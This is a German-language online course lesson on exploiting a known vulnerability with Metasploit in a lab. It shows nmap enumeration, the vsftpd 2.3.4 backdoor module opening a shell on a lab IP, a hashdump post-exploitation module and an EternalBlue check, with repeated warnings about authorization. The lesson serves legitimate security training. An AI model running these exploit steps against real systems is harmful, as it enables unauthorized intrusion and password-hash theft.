0Pricing
Cyber Security Academy · Lektion

Eine bekannte Schwachstelle ausnutzen

Verwenden Sie in einer Laborumgebung ein Exploit-Modul gegen ein verwundbares Ziel und interpretieren Sie die Sitzungs-Ausgabe.

Eine bekannte Schwachstelle ausnutzen ist eine kostenlose Cyber Security Academy-Lektion auf CoddyKit. Dies ist Lektion 2 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Cyber Security Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.

Ethik und Autorisierung zuerst

Exploitation ist nur gegen Systeme zulässig, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Testgenehmigung haben. Alle Beispiele hier sind für autorisierte Laborumgebungen bestimmt. Unbefugte Exploitation ist eine Straftat.

Empfehlung für die Laboreinrichtung

Verwenden Sie absichtlich verwundbare virtuelle Maschinen: Metasploitable2/3, DVWA, VulnHub-Systeme oder HackTheBox/TryHackMe für legale Übungen. Testen Sie niemals Produktions- oder reale Systeme ohne ein unterzeichnetes Scope-Dokument.

# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/

# Or use VulnHub
# https://www.vulnhub.com/

# Network: host-only adapter (isolated)

Aufklärung vor der Exploitation

Führen Sie immer zuerst eine Enumeration durch. Ermitteln Sie die genaue Dienstversion, das Betriebssystem und den Kontext, bevor Sie einen Exploit auswählen. Falsche Version = fehlgeschlagener Exploit oder Systemabsturz.

sudo nmap -sV -O 192.168.1.100

# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploit

Den richtigen Exploit auswählen

Suchen Sie nach Dienstname und Version. Bevorzugen Sie Module mit dem Rang Excellent oder Great. Lesen Sie die info-Ausgabe, um zu bestätigen, dass Zielplattform und Versionsbereich übereinstimmen.

msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent

msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

Exploit konfigurieren und ausführen

Legen Sie RHOSTS (Remote-Ziel), LHOST (Ihre IP-Adresse für Reverse-Verbindungen) und LPORT (Listener-Port) fest, wählen Sie einen Payload aus und führen Sie ihn anschließend aus. Achten Sie auf die Erstellung einer Sitzung oder auf Fehlermeldungen.

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run

# [*] Command shell session 1 opened

Ergebnisse interpretieren

Ein erfolgreicher Exploit öffnet eine Sitzung. Fehlgeschlagene Exploits zeigen Fehlermeldungen an: connection refused (Port nicht geöffnet), exploit failed (falsche Version), no session created (Payload konnte keine Rückverbindung herstellen).

# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened

# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was created

Mit einer Sitzung interagieren

Interagieren Sie nach der Exploitation mit der Sitzung über sessions -i . Einfache Command-Shell-Sitzungen stellen ein Terminal bereit; Meterpreter-Sitzungen bieten eine umfangreiche API.

msf6 > sessions          # list all sessions
msf6 > sessions -i 1     # interact with session 1

# Once inside:
id
whoami
ifconfig
uname -a

Sitzungen in den Hintergrund verschieben und mehrere Sitzungen verwalten

Drücken Sie Ctrl+Z, um eine Sitzung in den Hintergrund zu verschieben und zu msfconsole zurückzukehren. So können Sie mehrere Sitzungen verwalten oder Post-Exploitation-Module gegen eine bestimmte Sitzung ausführen.

# Background active session
Ctrl+Z

# List sessions
msf6 > sessions

# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > run

Prüfbefehl

Viele Exploit-Module implementieren einen check-Befehl, der testet, ob das Ziel verwundbar ist, ohne es tatsächlich auszunutzen. Führen Sie, sofern verfügbar, immer zuerst check aus.

msf6 exploit(ms17_010_eternalblue) > check

# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.

Überlegungen zur Exploit-Zuverlässigkeit

Exploits können Dienste zum Absturz bringen, Warnungen auslösen oder Protokolleinträge hinterlassen. Planen Sie bei Prüfungen in Produktionsumgebungen die Ausführung von Exploits in Zeiten mit geringem Datenverkehr, halten Sie einen Rollback-Plan bereit und bestätigen Sie vor der Ausführung potenziell destruktiver Aktionen, dass Backups vorhanden sind.

Exploitation dokumentieren

Dokumentieren Sie Zeitstempel, Ziel-IP-Adresse und -Port, verwendetes Exploit-Modul, CVE-Nummer, verwendeten Payload, erhaltene Sitzung und Belege (Screenshot oder Terminalausgabe). Dies ist Ihr Nachweis der Schwachstelle für den Bericht.

Kurzer Test

Was bewirkt der Metasploit-Befehl "check"?

Zusammenfassung: Schwachstellen ausnutzen

Eine ethische Exploitation folgt einem klaren Ablauf: Holen Sie eine schriftliche Genehmigung ein, führen Sie eine sorgfältige Enumeration durch, wählen Sie den passenden Exploit aus, lesen Sie die Modulbeschreibung, führen Sie, sofern verfügbar, zuerst check aus, starten Sie die Ausführung und dokumentieren Sie alles. Nutzen Sie niemals einen Exploit ohne Genehmigung – technische Kompetenz und ethische Grenzen sind untrennbar miteinander verbunden.

Häufig gestellte Fragen

Ist die Lektion „Eine bekannte Schwachstelle ausnutzen“ kostenlos?

Ja — der vollständige Text von „Eine bekannte Schwachstelle ausnutzen“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Cyber Security Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.

Was lerne ich in „Eine bekannte Schwachstelle ausnutzen“?

Verwenden Sie in einer Laborumgebung ein Exploit-Modul gegen ein verwundbares Ziel und interpretieren Sie die Sitzungs-Ausgabe. Du übst Cyber Security Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.

Brauche ich Erfahrung, um Cyber Security Academy zu starten?

Keine Vorkenntnisse erforderlich. Cyber Security Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 2 von 4.

Wie lange dauert die Lektion „Eine bekannte Schwachstelle ausnutzen“?

Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.

Kann ich in dieser Cyber Security Academy-Lektion Code schreiben und ausführen?

Ja. Jede Cyber Security Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.

Alle Lektionen in diesem Kurs

  1. Metasploit-Architektur und msfconsole
  2. Eine bekannte Schwachstelle ausnutzen
  3. Payloads: Staged vs. Stageless und Meterpreter
  4. Post-Exploitation: Pivoting und Persistenz
← Zurück zu Cyber Security Academy